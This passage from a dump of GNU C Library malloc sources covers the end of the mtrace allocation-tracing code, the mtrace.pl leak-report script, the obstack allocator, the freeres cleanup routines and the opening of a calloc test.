lock_and_info (caller, &mem); 231 | 232 | __memalign_hook = tr_old_memalign_hook; 233 | __malloc_hook = tr_old_malloc_hook; 234 | if (tr_old_memalign_hook != NULL) 235 | hdr = (__ptr_t) (*tr_old_memalign_hook)(alignment, size, caller); 236 | else 237 | hdr = (__ptr_t) memalign (alignment, size); 238 | __memalign_hook = tr_memalignhook; 239 | __malloc_hook = tr_mallochook; 240 | 241 | tr_where (caller, info); 242 | /* We could be printing a NULL here; that's OK. */ 243 | fprintf (mallstream, "+ %p %#lx\n", hdr, (unsigned long int) size); 244 | 245 | __libc_lock_unlock (lock); 246 | 247 | if (hdr == mallwatch) 248 | tr_break (); 249 | 250 | return hdr; 251 | } 252 | 253 | 254 | #ifdef _LIBC 255 | 256 | /* This function gets called to make sure all memory the library 257 | allocates get freed and so does not irritate the user when studying 258 | the mtrace output. */ 259 | static void __libc_freeres_fn_section 260 | release_libc_mem (void) 261 | { 262 | /* Only call the free function if we still are running in mtrace mode. */ 263 | if (mallstream != NULL) 264 | __libc_freeres (); 265 | } 266 | #endif 267 | 268 | 269 | /* We enable tracing if either the environment variable MALLOC_TRACE 270 | is set, or if the variable mallwatch has been patched to an address 271 | that the debugging user wants us to stop on. When patching mallwatch, 272 | don't forget to set a breakpoint on tr_break! */ 273 | 274 | void 275 | mtrace (void) 276 | { 277 | #ifdef _LIBC 278 | static int added_atexit_handler; 279 | #endif 280 | char *mallfile; 281 | 282 | /* Don't panic if we're called more than once. */ 283 | if (mallstream != NULL) 284 | return; 285 | 286 | #ifdef _LIBC 287 | /* When compiling the GNU libc we use the secure getenv function 288 | which prevents the misuse in case of SUID or SGID enabled 289 | programs. */ 290 | mallfile = __libc_secure_getenv (mallenv); 291 | #else 292 | mallfile = getenv (mallenv); 293 | #endif 294 | if (mallfile != NULL || mallwatch != NULL) 295 | { 296 | char *mtb = malloc (TRACE_BUFFER_SIZE); 297 | if (mtb == NULL) 298 | return; 299 | 300 | mallstream = fopen (mallfile != NULL ? mallfile : "/dev/null", "wce"); 301 | if (mallstream != NULL) 302 | { 303 | #ifndef __ASSUME_O_CLOEXEC 304 | /* Make sure we close the file descriptor on exec. */ 305 | int flags = __fcntl (fileno (mallstream), F_GETFD, 0); 306 | if (flags >= 0) 307 | { 308 | flags |= FD_CLOEXEC; 309 | __fcntl (fileno (mallstream), F_SETFD, flags); 310 | } 311 | #endif 312 | /* Be sure it doesn't malloc its buffer! */ 313 | malloc_trace_buffer = mtb; 314 | setvbuf (mallstream, malloc_trace_buffer, _IOFBF, TRACE_BUFFER_SIZE); 315 | fprintf (mallstream, "= Start\n"); 316 | tr_old_free_hook = __free_hook; 317 | __free_hook = tr_freehook; 318 | tr_old_malloc_hook = __malloc_hook; 319 | __malloc_hook = tr_mallochook; 320 | tr_old_realloc_hook = __realloc_hook; 321 | __realloc_hook = tr_reallochook; 322 | tr_old_memalign_hook = __memalign_hook; 323 | __memalign_hook = tr_memalignhook; 324 | #ifdef _LIBC 325 | if (!added_atexit_handler) 326 | { 327 | extern void *__dso_handle __attribute__ ((__weak__)); 328 | added_atexit_handler = 1; 329 | __cxa_atexit ((void (*)(void *))release_libc_mem, NULL, 330 | &__dso_handle ? __dso_handle : NULL); 331 | } 332 | #endif 333 | } 334 | else 335 | free (mtb); 336 | } 337 | } 338 | 339 | void 340 | muntrace (void) 341 | { 342 | if (mallstream == NULL) 343 | return; 344 | 345 | /* Do the reverse of what done in mtrace: first reset the hooks and 346 | MALLSTREAM, and only after that write the trailer and close the 347 | file. */ 348 | FILE *f = mallstream; 349 | mallstream = NULL; 350 | __free_hook = tr_old_free_hook; 351 | __malloc_hook = tr_old_malloc_hook; 352 | __realloc_hook = tr_old_realloc_hook; 353 | __memalign_hook = tr_old_memalign_hook; 354 | 355 | fprintf (f, "= End\n"); 356 | fclose (f); 357 | } 358 | -------------------------------------------------------------------------------- /glibc/malloc/mtrace.pl: -------------------------------------------------------------------------------- 1 | #! @PERL@ 2 | eval "exec @PERL@ -S $0 $@" 3 | if 0; 4 | # Copyright (C) 1997-2014 Free Software Foundation, Inc. 5 | # This file is part of the GNU C Library. 6 | # Contributed by Ulrich Drepper , 1997. 7 | # Based on the mtrace.awk script. 8 | 9 | # The GNU C Library is free software; you can redistribute it and/or 10 | # modify it under the terms of the GNU Lesser General Public 11 | # License as published by the Free Software Foundation; either 12 | # version 2.1 of the License, or (at your option) any later version. 13 | 14 | # The GNU C Library is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 17 | # Lesser General Public License for more details. 18 | 19 | # You should have received a copy of the GNU Lesser General Public 20 | # License along with the GNU C Library; if not, see 21 | # . 22 | 23 | $VERSION = "@VERSION@"; 24 | $PKGVERSION = "@PKGVERSION@"; 25 | $REPORT_BUGS_TO = '@REPORT_BUGS_TO@'; 26 | $progname = $0; 27 | 28 | sub usage { 29 | print "Usage: mtrace [OPTION]... [Binary] MtraceData\n"; 30 | print " --help print this help, then exit\n"; 31 | print " --version print version number, then exit\n"; 32 | print "\n"; 33 | print "For bug reporting instructions, please see:\n"; 34 | print "$REPORT_BUGS_TO.\n"; 35 | exit 0; 36 | } 37 | 38 | # We expect two arguments: 39 | # #1: the complete path to the binary 40 | # #2: the mtrace data filename 41 | # The usual options are also recognized. 42 | 43 | arglist: while (@ARGV) { 44 | if ($ARGV[0] eq "--v" || $ARGV[0] eq "--ve" || $ARGV[0] eq "--ver" || 45 | $ARGV[0] eq "--vers" || $ARGV[0] eq "--versi" || 46 | $ARGV[0] eq "--versio" || $ARGV[0] eq "--version") { 47 | print "mtrace $PKGVERSION$VERSION\n"; 48 | print "Copyright (C) 2014 Free Software Foundation, Inc.\n"; 49 | print "This is free software; see the source for copying conditions. There is NO\n"; 50 | print "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n"; 51 | print "Written by Ulrich Drepper \n"; 52 | 53 | exit 0; 54 | } elsif ($ARGV[0] eq "--h" || $ARGV[0] eq "--he" || $ARGV[0] eq "--hel" || 55 | $ARGV[0] eq "--help") { 56 | &usage; 57 | } elsif ($ARGV[0] =~ /^-/) { 58 | print "$progname: unrecognized option `$ARGV[0]'\n"; 59 | print "Try `$progname --help' for more information.\n"; 60 | exit 1; 61 | } else { 62 | last arglist; 63 | } 64 | } 65 | 66 | if ($#ARGV == 0) { 67 | $binary=""; 68 | $data=$ARGV[0]; 69 | } elsif ($#ARGV == 1) { 70 | $binary=$ARGV[0]; 71 | $data=$ARGV[1]; 72 | 73 | if ($binary =~ /^.*[\/].*$/) { 74 | $prog = $binary; 75 | } else { 76 | $prog = "./$binary"; 77 | } 78 | if (open (LOCS, "env LD_TRACE_LOADED_OBJECTS=1 $prog |")) { 79 | while () { 80 | chop; 81 | if (/^.*=> (.*) .(0x[0123456789abcdef]*).$/) { 82 | $locs{$1} = $2; 83 | } 84 | } 85 | close (LOCS); 86 | } 87 | } else { 88 | die "Wrong number of arguments, run $progname --help for help."; 89 | } 90 | 91 | sub location { 92 | my $str = pop(@_); 93 | return $str if ($str eq ""); 94 | if ($str =~ /.*[[](0x[^]]*)]:(.)*/) { 95 | my $addr = $1; 96 | my $fct = $2; 97 | return $cache{$addr} if (exists $cache{$addr}); 98 | if ($binary ne "" && open (ADDR, "addr2line -e $binary $addr|")) { 99 | my $line = ; 100 | chomp $line; 101 | close (ADDR); 102 | if ($line ne '??:0') { 103 | $cache{$addr} = $line; 104 | return $cache{$addr}; 105 | } 106 | } 107 | $cache{$addr} = $str = "$fct @ $addr"; 108 | } elsif ($str =~ /^(.*):.*[[](0x[^]]*)]$/) { 109 | my $prog = $1; 110 | my $addr = $2; 111 | my $searchaddr; 112 | return $cache{$addr} if (exists $cache{$addr}); 113 | if ($locs{$prog} ne "") { 114 | $searchaddr = sprintf "%#x", $addr - $locs{$prog}; 115 | } else { 116 | $searchaddr = $addr; 117 | $prog = $binary; 118 | } 119 | if ($binary ne "" && open (ADDR, "addr2line -e $prog $searchaddr|")) { 120 | my $line = ; 121 | chomp $line; 122 | close (ADDR); 123 | if ($line ne '??:0') { 124 | $cache{$addr} = $line; 125 | return $cache{$addr}; 126 | } 127 | } 128 | $cache{$addr} = $str = $addr; 129 | } elsif ($str =~ /^.*[[](0x[^]]*)]$/) { 130 | my $addr = $1; 131 | return $cache{$addr} if (exists $cache{$addr}); 132 | if ($binary ne "" && open (ADDR, "addr2line -e $binary $addr|")) { 133 | my $line = ; 134 | chomp $line; 135 | close (ADDR); 136 | if ($line ne '??:0') { 137 | $cache{$addr} = $line; 138 | return $cache{$addr}; 139 | } 140 | } 141 | $cache{$addr} = $str = $addr; 142 | } 143 | return $str; 144 | } 145 | 146 | $nr=0; 147 | open(DATA, "<$data") || die "Cannot open mtrace data file"; 148 | while () { 149 | my @cols = split (' '); 150 | my $n, $where; 151 | if ($cols[0] eq "@") { 152 | # We have address and/or function name. 153 | $where=$cols[1]; 154 | $n=2; 155 | } else { 156 | $where=""; 157 | $n=0; 158 | } 159 | 160 | $allocaddr=$cols[$n + 1]; 161 | $howmuch=hex($cols[$n + 2]); 162 | 163 | ++$nr; 164 | SWITCH: { 165 | if ($cols[$n] eq "+") { 166 | if (defined $allocated{$allocaddr}) { 167 | printf ("+ %#0@XXX@x Alloc %d duplicate: %s %s\n", 168 | hex($allocaddr), $nr, &location($addrwas{$allocaddr}), 169 | $where); 170 | } else { 171 | $allocated{$allocaddr}=$howmuch; 172 | $addrwas{$allocaddr}=$where; 173 | } 174 | last SWITCH; 175 | } 176 | if ($cols[$n] eq "-") { 177 | if (defined $allocated{$allocaddr}) { 178 | undef $allocated{$allocaddr}; 179 | undef $addrwas{$allocaddr}; 180 | } else { 181 | printf ("- %#0@XXX@x Free %d was never alloc'd %s\n", 182 | hex($allocaddr), $nr, &location($where)); 183 | } 184 | last SWITCH; 185 | } 186 | if ($cols[$n] eq "<") { 187 | if (defined $allocated{$allocaddr}) { 188 | undef $allocated{$allocaddr}; 189 | undef $addrwas{$allocaddr}; 190 | } else { 191 | printf ("- %#0@XXX@x Realloc %d was never alloc'd %s\n", 192 | hex($allocaddr), $nr, &location($where)); 193 | } 194 | last SWITCH; 195 | } 196 | if ($cols[$n] eq ">") { 197 | if (defined $allocated{$allocaddr}) { 198 | printf ("+ %#0@XXX@x Realloc %d duplicate: %#010x %s %s\n", 199 | hex($allocaddr), $nr, $allocated{$allocaddr}, 200 | &location($addrwas{$allocaddr}), &location($where)); 201 | } else { 202 | $allocated{$allocaddr}=$howmuch; 203 | $addrwas{$allocaddr}=$where; 204 | } 205 | last SWITCH; 206 | } 207 | if ($cols[$n] eq "=") { 208 | # Ignore "= Start". 209 | last SWITCH; 210 | } 211 | if ($cols[$n] eq "!") { 212 | # Ignore failed realloc for now. 213 | last SWITCH; 214 | } 215 | } 216 | } 217 | close (DATA); 218 | 219 | # Now print all remaining entries. 220 | @addrs= keys %allocated; 221 | $anything=0; 222 | if ($#addrs >= 0) { 223 | foreach $addr (sort @addrs) { 224 | if (defined $allocated{$addr}) { 225 | if ($anything == 0) { 226 | print "\nMemory not freed:\n-----------------\n"; 227 | print ' ' x (@XXX@ - 7), "Address Size Caller\n"; 228 | $anything=1; 229 | } 230 | printf ("%#0@XXX@x %#8x at %s\n", hex($addr), $allocated{$addr}, 231 | &location($addrwas{$addr})); 232 | } 233 | } 234 | } 235 | print "No memory leaks.\n" if ($anything == 0); 236 | 237 | exit $anything != 0; 238 | -------------------------------------------------------------------------------- /glibc/malloc/obstack.c: -------------------------------------------------------------------------------- 1 | /* obstack.c - subroutines used implicitly by object stack macros 2 | Copyright (C) 1988-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | 20 | #ifdef _LIBC 21 | # include 22 | # include 23 | #else 24 | # include 25 | # include "obstack.h" 26 | #endif 27 | 28 | /* NOTE BEFORE MODIFYING THIS FILE: This version number must be 29 | incremented whenever callers compiled using an old obstack.h can no 30 | longer properly call the functions in this obstack.c. */ 31 | #define OBSTACK_INTERFACE_VERSION 1 32 | 33 | /* Comment out all this code if we are using the GNU C Library, and are not 34 | actually compiling the library itself, and the installed library 35 | supports the same library interface we do. This code is part of the GNU 36 | C Library, but also included in many other GNU distributions. Compiling 37 | and linking in this code is a waste when using the GNU C library 38 | (especially if it is a shared library). Rather than having every GNU 39 | program understand 'configure --with-gnu-libc' and omit the object 40 | files, it is simpler to just do this in the source for each such file. */ 41 | 42 | #include /* Random thing to get __GNU_LIBRARY__. */ 43 | #if !defined _LIBC && defined __GNU_LIBRARY__ && __GNU_LIBRARY__ > 1 44 | # include 45 | # if _GNU_OBSTACK_INTERFACE_VERSION == OBSTACK_INTERFACE_VERSION 46 | # define ELIDE_CODE 47 | # endif 48 | #endif 49 | 50 | #include 51 | 52 | #ifndef ELIDE_CODE 53 | 54 | 55 | # include 56 | 57 | /* Determine default alignment. */ 58 | union fooround 59 | { 60 | uintmax_t i; 61 | long double d; 62 | void *p; 63 | }; 64 | struct fooalign 65 | { 66 | char c; 67 | union fooround u; 68 | }; 69 | /* If malloc were really smart, it would round addresses to DEFAULT_ALIGNMENT. 70 | But in fact it might be less smart and round addresses to as much as 71 | DEFAULT_ROUNDING. So we prepare for it to do that. */ 72 | enum 73 | { 74 | DEFAULT_ALIGNMENT = offsetof (struct fooalign, u), 75 | DEFAULT_ROUNDING = sizeof (union fooround) 76 | }; 77 | 78 | /* When we copy a long block of data, this is the unit to do it with. 79 | On some machines, copying successive ints does not work; 80 | in such a case, redefine COPYING_UNIT to 'long' (if that works) 81 | or 'char' as a last resort. */ 82 | # ifndef COPYING_UNIT 83 | # define COPYING_UNIT int 84 | # endif 85 | 86 | 87 | /* The functions allocating more room by calling 'obstack_chunk_alloc' 88 | jump to the handler pointed to by 'obstack_alloc_failed_handler'. 89 | This can be set to a user defined function which should either 90 | abort gracefully or use longjump - but shouldn't return. This 91 | variable by default points to the internal function 92 | 'print_and_abort'. */ 93 | static _Noreturn void print_and_abort (void); 94 | void (*obstack_alloc_failed_handler) (void) = print_and_abort; 95 | 96 | /* Exit value used when 'print_and_abort' is used. */ 97 | # include 98 | # ifdef _LIBC 99 | int obstack_exit_failure = EXIT_FAILURE; 100 | # else 101 | # include "exitfail.h" 102 | # define obstack_exit_failure exit_failure 103 | # endif 104 | 105 | # ifdef _LIBC 106 | # if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_3_4) 107 | /* A looong time ago (before 1994, anyway; we're not sure) this global variable 108 | was used by non-GNU-C macros to avoid multiple evaluation. The GNU C 109 | library still exports it because somebody might use it. */ 110 | struct obstack *_obstack_compat = 0; 111 | compat_symbol (libc, _obstack_compat, _obstack, GLIBC_2_0); 112 | # endif 113 | # endif 114 | 115 | /* Define a macro that either calls functions with the traditional malloc/free 116 | calling interface, or calls functions with the mmalloc/mfree interface 117 | (that adds an extra first argument), based on the state of use_extra_arg. 118 | For free, do not use ?:, since some compilers, like the MIPS compilers, 119 | do not allow (expr) ? void : void. */ 120 | 121 | # define CALL_CHUNKFUN(h, size) \ 122 | (((h)->use_extra_arg) \ 123 | ? (*(h)->chunkfun)((h)->extra_arg, (size)) \ 124 | : (*(struct _obstack_chunk *(*)(long))(h)->chunkfun)((size))) 125 | 126 | # define CALL_FREEFUN(h, old_chunk) \ 127 | do { \ 128 | if ((h)->use_extra_arg) \ 129 | (*(h)->freefun)((h)->extra_arg, (old_chunk)); \ 130 | else \ 131 | (*(void (*)(void *))(h)->freefun)((old_chunk)); \ 132 | } while (0) 133 | 134 | 135 | /* Initialize an obstack H for use. Specify chunk size SIZE (0 means default). 136 | Objects start on multiples of ALIGNMENT (0 means use default). 137 | CHUNKFUN is the function to use to allocate chunks, 138 | and FREEFUN the function to free them. 139 | 140 | Return nonzero if successful, calls obstack_alloc_failed_handler if 141 | allocation fails. */ 142 | 143 | int 144 | _obstack_begin (struct obstack *h, 145 | int size, int alignment, 146 | void *(*chunkfun) (long), 147 | void (*freefun) (void *)) 148 | { 149 | struct _obstack_chunk *chunk; /* points to new chunk */ 150 | 151 | if (alignment == 0) 152 | alignment = DEFAULT_ALIGNMENT; 153 | if (size == 0) 154 | /* Default size is what GNU malloc can fit in a 4096-byte block. */ 155 | { 156 | /* 12 is sizeof (mhead) and 4 is EXTRA from GNU malloc. 157 | Use the values for range checking, because if range checking is off, 158 | the extra bytes won't be missed terribly, but if range checking is on 159 | and we used a larger request, a whole extra 4096 bytes would be 160 | allocated. 161 | 162 | These number are irrelevant to the new GNU malloc. I suspect it is 163 | less sensitive to the size of the request. */ 164 | int extra = ((((12 + DEFAULT_ROUNDING - 1) & ~(DEFAULT_ROUNDING - 1)) 165 | + 4 + DEFAULT_ROUNDING - 1) 166 | & ~(DEFAULT_ROUNDING - 1)); 167 | size = 4096 - extra; 168 | } 169 | 170 | h->chunkfun = (struct _obstack_chunk * (*) (void *, long)) chunkfun; 171 | h->freefun = (void (*) (void *, struct _obstack_chunk *)) freefun; 172 | h->chunk_size = size; 173 | h->alignment_mask = alignment - 1; 174 | h->use_extra_arg = 0; 175 | 176 | chunk = h->chunk = CALL_CHUNKFUN (h, h->chunk_size); 177 | if (!chunk) 178 | (*obstack_alloc_failed_handler) (); 179 | h->next_free = h->object_base = __PTR_ALIGN ((char *) chunk, chunk->contents, 180 | alignment - 1); 181 | h->chunk_limit = chunk->limit 182 | = (char *) chunk + h->chunk_size; 183 | chunk->prev = 0; 184 | /* The initial chunk now contains no empty object. */ 185 | h->maybe_empty_object = 0; 186 | h->alloc_failed = 0; 187 | return 1; 188 | } 189 | 190 | int 191 | _obstack_begin_1 (struct obstack *h, int size, int alignment, 192 | void *(*chunkfun) (void *, long), 193 | void (*freefun) (void *, void *), 194 | void *arg) 195 | { 196 | struct _obstack_chunk *chunk; /* points to new chunk */ 197 | 198 | if (alignment == 0) 199 | alignment = DEFAULT_ALIGNMENT; 200 | if (size == 0) 201 | /* Default size is what GNU malloc can fit in a 4096-byte block. */ 202 | { 203 | /* 12 is sizeof (mhead) and 4 is EXTRA from GNU malloc. 204 | Use the values for range checking, because if range checking is off, 205 | the extra bytes won't be missed terribly, but if range checking is on 206 | and we used a larger request, a whole extra 4096 bytes would be 207 | allocated. 208 | 209 | These number are irrelevant to the new GNU malloc. I suspect it is 210 | less sensitive to the size of the request. */ 211 | int extra = ((((12 + DEFAULT_ROUNDING - 1) & ~(DEFAULT_ROUNDING - 1)) 212 | + 4 + DEFAULT_ROUNDING - 1) 213 | & ~(DEFAULT_ROUNDING - 1)); 214 | size = 4096 - extra; 215 | } 216 | 217 | h->chunkfun = (struct _obstack_chunk * (*)(void *,long)) chunkfun; 218 | h->freefun = (void (*) (void *, struct _obstack_chunk *)) freefun; 219 | h->chunk_size = size; 220 | h->alignment_mask = alignment - 1; 221 | h->extra_arg = arg; 222 | h->use_extra_arg = 1; 223 | 224 | chunk = h->chunk = CALL_CHUNKFUN (h, h->chunk_size); 225 | if (!chunk) 226 | (*obstack_alloc_failed_handler) (); 227 | h->next_free = h->object_base = __PTR_ALIGN ((char *) chunk, chunk->contents, 228 | alignment - 1); 229 | h->chunk_limit = chunk->limit 230 | = (char *) chunk + h->chunk_size; 231 | chunk->prev = 0; 232 | /* The initial chunk now contains no empty object. */ 233 | h->maybe_empty_object = 0; 234 | h->alloc_failed = 0; 235 | return 1; 236 | } 237 | 238 | /* Allocate a new current chunk for the obstack *H 239 | on the assumption that LENGTH bytes need to be added 240 | to the current object, or a new object of length LENGTH allocated. 241 | Copies any partial object from the end of the old chunk 242 | to the beginning of the new one. */ 243 | 244 | void 245 | _obstack_newchunk (struct obstack *h, int length) 246 | { 247 | struct _obstack_chunk *old_chunk = h->chunk; 248 | struct _obstack_chunk *new_chunk; 249 | long new_size; 250 | long obj_size = h->next_free - h->object_base; 251 | long i; 252 | long already; 253 | char *object_base; 254 | 255 | /* Compute size for new chunk. */ 256 | new_size = (obj_size + length) + (obj_size >> 3) + h->alignment_mask + 100; 257 | if (new_size < h->chunk_size) 258 | new_size = h->chunk_size; 259 | 260 | /* Allocate and initialize the new chunk. */ 261 | new_chunk = CALL_CHUNKFUN (h, new_size); 262 | if (!new_chunk) 263 | (*obstack_alloc_failed_handler)(); 264 | h->chunk = new_chunk; 265 | new_chunk->prev = old_chunk; 266 | new_chunk->limit = h->chunk_limit = (char *) new_chunk + new_size; 267 | 268 | /* Compute an aligned object_base in the new chunk */ 269 | object_base = 270 | __PTR_ALIGN ((char *) new_chunk, new_chunk->contents, h->alignment_mask); 271 | 272 | /* Move the existing object to the new chunk. 273 | Word at a time is fast and is safe if the object 274 | is sufficiently aligned. */ 275 | if (h->alignment_mask + 1 >= DEFAULT_ALIGNMENT) 276 | { 277 | for (i = obj_size / sizeof (COPYING_UNIT) - 1; 278 | i >= 0; i--) 279 | ((COPYING_UNIT *) object_base)[i] 280 | = ((COPYING_UNIT *) h->object_base)[i]; 281 | /* We used to copy the odd few remaining bytes as one extra COPYING_UNIT, 282 | but that can cross a page boundary on a machine 283 | which does not do strict alignment for COPYING_UNITS. */ 284 | already = obj_size / sizeof (COPYING_UNIT) * sizeof (COPYING_UNIT); 285 | } 286 | else 287 | already = 0; 288 | /* Copy remaining bytes one by one. */ 289 | for (i = already; i < obj_size; i++) 290 | object_base[i] = h->object_base[i]; 291 | 292 | /* If the object just copied was the only data in OLD_CHUNK, 293 | free that chunk and remove it from the chain. 294 | But not if that chunk might contain an empty object. */ 295 | if (!h->maybe_empty_object 296 | && (h->object_base 297 | == __PTR_ALIGN ((char *) old_chunk, old_chunk->contents, 298 | h->alignment_mask))) 299 | { 300 | new_chunk->prev = old_chunk->prev; 301 | CALL_FREEFUN (h, old_chunk); 302 | } 303 | 304 | h->object_base = object_base; 305 | h->next_free = h->object_base + obj_size; 306 | /* The new chunk certainly contains no empty object yet. */ 307 | h->maybe_empty_object = 0; 308 | } 309 | # ifdef _LIBC 310 | libc_hidden_def (_obstack_newchunk) 311 | # endif 312 | 313 | /* Return nonzero if object OBJ has been allocated from obstack H. 314 | This is here for debugging. 315 | If you use it in a program, you are probably losing. */ 316 | 317 | /* Suppress -Wmissing-prototypes warning. We don't want to declare this in 318 | obstack.h because it is just for debugging. */ 319 | int _obstack_allocated_p (struct obstack *h, void *obj) __attribute_pure__; 320 | 321 | int 322 | _obstack_allocated_p (struct obstack *h, void *obj) 323 | { 324 | struct _obstack_chunk *lp; /* below addr of any objects in this chunk */ 325 | struct _obstack_chunk *plp; /* point to previous chunk if any */ 326 | 327 | lp = (h)->chunk; 328 | /* We use >= rather than > since the object cannot be exactly at 329 | the beginning of the chunk but might be an empty object exactly 330 | at the end of an adjacent chunk. */ 331 | while (lp != 0 && ((void *) lp >= obj || (void *) (lp)->limit < obj)) 332 | { 333 | plp = lp->prev; 334 | lp = plp; 335 | } 336 | return lp != 0; 337 | } 338 | 339 | /* Free objects in obstack H, including OBJ and everything allocate 340 | more recently than OBJ. If OBJ is zero, free everything in H. */ 341 | 342 | # undef obstack_free 343 | 344 | void 345 | __obstack_free (struct obstack *h, void *obj) 346 | { 347 | struct _obstack_chunk *lp; /* below addr of any objects in this chunk */ 348 | struct _obstack_chunk *plp; /* point to previous chunk if any */ 349 | 350 | lp = h->chunk; 351 | /* We use >= because there cannot be an object at the beginning of a chunk. 352 | But there can be an empty object at that address 353 | at the end of another chunk. */ 354 | while (lp != 0 && ((void *) lp >= obj || (void *) (lp)->limit < obj)) 355 | { 356 | plp = lp->prev; 357 | CALL_FREEFUN (h, lp); 358 | lp = plp; 359 | /* If we switch chunks, we can't tell whether the new current 360 | chunk contains an empty object, so assume that it may. */ 361 | h->maybe_empty_object = 1; 362 | } 363 | if (lp) 364 | { 365 | h->object_base = h->next_free = (char *) (obj); 366 | h->chunk_limit = lp->limit; 367 | h->chunk = lp; 368 | } 369 | else if (obj != 0) 370 | /* obj is not in any of the chunks! */ 371 | abort (); 372 | } 373 | 374 | # ifdef _LIBC 375 | /* Older versions of libc used a function _obstack_free intended to be 376 | called by non-GCC compilers. */ 377 | strong_alias (obstack_free, _obstack_free) 378 | # endif 379 | 380 | int 381 | _obstack_memory_used (struct obstack *h) 382 | { 383 | struct _obstack_chunk *lp; 384 | int nbytes = 0; 385 | 386 | for (lp = h->chunk; lp != 0; lp = lp->prev) 387 | { 388 | nbytes += lp->limit - (char *) lp; 389 | } 390 | return nbytes; 391 | } 392 | 393 | /* Define the error handler. */ 394 | # ifdef _LIBC 395 | # include 396 | # else 397 | # include "gettext.h" 398 | # endif 399 | # ifndef _ 400 | # define _(msgid) gettext (msgid) 401 | # endif 402 | 403 | # ifdef _LIBC 404 | # include 405 | # endif 406 | 407 | static _Noreturn void 408 | print_and_abort (void) 409 | { 410 | /* Don't change any of these strings. Yes, it would be possible to add 411 | the newline to the string and use fputs or so. But this must not 412 | happen because the "memory exhausted" message appears in other places 413 | like this and the translation should be reused instead of creating 414 | a very similar string which requires a separate translation. */ 415 | # ifdef _LIBC 416 | (void) __fxprintf (NULL, "%s\n", _("memory exhausted")); 417 | # else 418 | fprintf (stderr, "%s\n", _("memory exhausted")); 419 | # endif 420 | exit (obstack_exit_failure); 421 | } 422 | 423 | #endif /* !ELIDE_CODE */ 424 | -------------------------------------------------------------------------------- /glibc/malloc/set-freeres.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 1997-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | 4 | The GNU C Library is free software; you can redistribute it and/or 5 | modify it under the terms of the GNU Lesser General Public 6 | License as published by the Free Software Foundation; either 7 | version 2.1 of the License, or (at your option) any later version. 8 | 9 | The GNU C Library is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | Lesser General Public License for more details. 13 | 14 | You should have received a copy of the GNU Lesser General Public 15 | License along with the GNU C Library; if not, see 16 | . */ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | 23 | #include "../libio/libioP.h" 24 | 25 | DEFINE_HOOK (__libc_subfreeres, (void)); 26 | 27 | symbol_set_define (__libc_freeres_ptrs); 28 | 29 | void __libc_freeres_fn_section 30 | __libc_freeres (void) 31 | { 32 | /* This function might be called from different places. So better 33 | protect for multiple executions since these are fatal. */ 34 | static long int already_called; 35 | 36 | if (!atomic_compare_and_exchange_bool_acq (&already_called, 1, 0)) 37 | { 38 | void *const *p; 39 | 40 | _IO_cleanup (); 41 | 42 | RUN_HOOK (__libc_subfreeres, ()); 43 | 44 | for (p = symbol_set_first_element (__libc_freeres_ptrs); 45 | !symbol_set_end_p (__libc_freeres_ptrs, p); ++p) 46 | free (*p); 47 | } 48 | } 49 | libc_hidden_def (__libc_freeres) 50 | -------------------------------------------------------------------------------- /glibc/malloc/thread-freeres.c: -------------------------------------------------------------------------------- 1 | /* Free resources stored in thread-local variables on thread exit. 2 | Copyright (C) 2003-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | 23 | #ifdef _LIBC_REENTRANT 24 | DEFINE_HOOK (__libc_thread_subfreeres, (void)); 25 | 26 | void __attribute__ ((section ("__libc_thread_freeres_fn"))) 27 | __libc_thread_freeres (void) 28 | { 29 | RUN_HOOK (__libc_thread_subfreeres, ()); 30 | } 31 | #endif 32 | -------------------------------------------------------------------------------- /glibc/malloc/tst-calloc.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 2000-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | Contributed by Ulrich Drepper . 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | 26 | 27 | /* Number of samples per size. */ 28 | #define N 50000 29 | 30 | 31 | static void 32 | fixed_test (int size) 33 | { 34 | char *ptrs[N]; 35 | int i; 36 | 37 | for (i = 0; i < N; ++i) 38 | { 39 | int j; 40 | 41 | ptrs[i] = (char *) calloc (1, size); 42 | 43 | if (ptrs[i] == NULL) 44 | break; 45 | 46 | for (j = 0; j < size; ++j) 47 